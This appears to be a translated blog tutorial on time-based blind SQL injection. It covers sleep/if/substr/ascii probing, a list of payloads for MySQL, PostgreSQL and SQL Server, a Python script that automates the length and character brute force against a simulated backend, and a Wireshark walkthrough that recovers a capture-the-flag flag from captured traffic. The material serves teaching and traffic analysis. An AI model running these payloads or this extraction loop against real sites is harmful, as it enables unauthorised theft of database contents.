Wireshark packet analysis - time blind injection / delay injection attack

1. The principle of delayed injection

Delay injection, also called time-based blind injection, is one form of SQL blind injection. It is used when the page shows no visible reaction to the injected SQL at all, or when the response looks identical whether the injected condition is true or false, so that the only side channel left to the attacker is how long the server takes to answer.

Blind injection: a SQL injection in which the result of the injected query is not echoed back into the page, so the attacker has to recover it indirectly, by asking the database yes/no questions and observing some side effect of the answer. That process is called blind injection.

Blind injection is usually divided into three kinds:

1. Boolean-based blind injection: the page renders differently depending on whether the injected condition is true or false, and the attacker reads that difference;
2. Time-based blind injection: the page looks the same either way, and the attacker reads the response delay instead;
3. Error-based injection: a crafted input makes the database raise an error whose message carries the queried data back to the page.

Functions commonly used in delayed injection (MySQL syntax):

  • suspend the query for the given number of seconds
sleep(<seconds>)
  • conditional expression
if(<condition>,<true_expr>,<false_expr>)

Syntax: when condition is true, evaluate and return true_expr, otherwise return false_expr

  • length of a string
length()

Typical use: ?id=1' and if((length((subquery))=1), sleep(5), 3) -- a  to find the length of the query result. If the response takes more than 5 s the guessed length is correct; otherwise increase the guess by one and send the request again. (The a after -- is only a dummy token: MySQL requires whitespace after the -- comment marker, and the trailing word keeps that space from being trimmed off the end of the URL.)

  • extract a substring (start is 1-based)
substr(string,num start,num length)
  • convert a character to its ASCII code (used to test the character's value by brute-forcing the printable range 32 to 126)
ascii()

Common payloads (the first four differ by database; the last three differ by the context the injection point sits in):

sleep(10)--                               (MySQL)
benchmark(1000000000,md5(1))--            (MySQL; CPU-bound alternative when sleep() is blocked, the iteration count tunes the delay)
pg_sleep(10)--                            (PostgreSQL)
; WAITFOR DELAY '00:00:10';--             (SQL Server; T-SQL needs the delay as a quoted time string)
?id=1 and if(1,sleep(5),3) -- a           (numeric context)
?id=1' and if(1,sleep(5),3) -- a          (single-quoted string context)
?id=1" and if(1,sleep(5),3) -- a          (double-quoted string context)
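The length probe and character brute force described in this section, carried through in Python as an added example (this is not code from the original post). Because it has to run offline, the vulnerable MySQL backend is replaced by a constructed stand-in, simulated_request(), which inspects the injected condition against a made-up secret and reports the response time the real server would show, without actually sleeping. The table and column name flag are taken from the page's own payload; the 64-character length cap and the 0.5 s threshold slack are assumptions.

```python
import re
from typing import Callable

PRINTABLE = range(32, 127)   # ascii() values brute-forced by the text: 32..126
DELAY = 5                    # seconds requested with sleep(5)
THRESHOLD = DELAY - 0.5      # a response slower than this means the condition held

# Constructed stand-in for the vulnerable MySQL backend (assumption: a table
# `flag` with a column `flag`, as in the page's payload). It inspects the
# injected condition and returns the seconds the real server would have taken,
# without actually sleeping, so the demo finishes instantly.
SECRET = "flag{t1me_bl1nd}"
_LEN_RE = re.compile(r"length\(\(select flag from flag\)\)=(\d+)")
_CHAR_RE = re.compile(r"ascii\(substr\(\(select flag from flag\),(\d+),1\)\)=(\d+)")


def simulated_request(url: str) -> float:
    """Return the simulated response time (seconds) for one injected request."""
    m = _LEN_RE.search(url)
    if m:
        return float(DELAY) if len(SECRET) == int(m.group(1)) else 0.05
    m = _CHAR_RE.search(url)
    if m:
        pos, code = int(m.group(1)), int(m.group(2))
        return float(DELAY) if ord(SECRET[pos - 1]) == code else 0.05
    return 0.05


def payload(condition: str) -> str:
    """Wrap a condition in the page's  ?id=1' and if((cond), sleep(5), 3) -- a  form."""
    return f"?id=1' and if(({condition}), sleep({DELAY}), 3) -- a"


def probe_length(send: Callable[[str], float], max_len: int = 64) -> int:
    """Step 1: guess length((subquery)) = 1, 2, 3, ... until the response is delayed."""
    for n in range(1, max_len + 1):
        if send(payload(f"length((select flag from flag))={n}")) >= THRESHOLD:
            return n
    raise RuntimeError(f"no length up to {max_len} produced a delay")


def probe_char(send: Callable[[str], float], pos: int) -> str:
    """Step 2: for one position, try ascii(substr(...,pos,1)) = 32..126 in turn."""
    for code in PRINTABLE:
        cond = f"ascii(substr((select flag from flag),{pos},1))={code}"
        if send(payload(cond)) >= THRESHOLD:
            return chr(code)
    raise RuntimeError(f"no printable character matched at position {pos}")


def recover(send: Callable[[str], float]) -> str:
    """Run the full procedure: length first, then each character position."""
    length = probe_length(send)
    return "".join(probe_char(send, pos) for pos in range(1, length + 1))


if __name__ == "__main__":
    print(recover(simulated_request))   # flag{t1me_bl1nd}
```

Against a real target, send() would issue the HTTP request and return the measured round-trip time; everything else stays the same. Note how many requests the linear scan costs (up to 95 per character), which is exactly why the captured traffic in the next section contains so many near-identical probes.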

2. Data packet analysis

① Open the capture file; an obvious POST request stands out.

② Select that packet and use Follow -> HTTP Stream; the stream contains keywords such as ascii, substr and sleep:

③ The reserved characters in the request (such as ; / ? @ : & = + % $ and the other punctuation that delimits URI components) are percent-encoded, which indicates the client used encodeURIComponent() or an equivalent. Decode it with an online tool (https://www.sojson.com/encodeurl.html) or any URL decoder:

After one round of decoding the request still contains percent-encoding, so decode the result a second time:

④ The delayed-injection statement is now readable: id=1) and if((ascii(substr((select flag from flag),1,1))='40'),sleep(3),0) -- . The ) after 1 closes a parenthesis that the original query evidently put around the id value; the subquery reads the flag column, substr(...,1,1) takes its first character, ascii() converts it to a number, and '40' is the ASCII code of the left parenthesis ( being tested for that position. If the guess is right the server sleeps 3 s before responding, otherwise it answers immediately.
⑤ Apply the display filter frame.time_delta > 3 && http to keep only the HTTP packets that arrived more than 3 s after the previous captured frame; these are the responses to the guesses that were correct. Walk through them, open each one's request (the frame referenced by http.request_in) to read the position and the ASCII value it tested, and assemble the characters into the flag. Note that frame.time_delta measures the gap to the previous frame in the capture, not to the matching request; on a capture with other interleaved traffic the filter http.time > 3 (time since the request) is the more reliable choice.


Source: blog.csdn.net/Zhou_ZiZi/article/details/126486912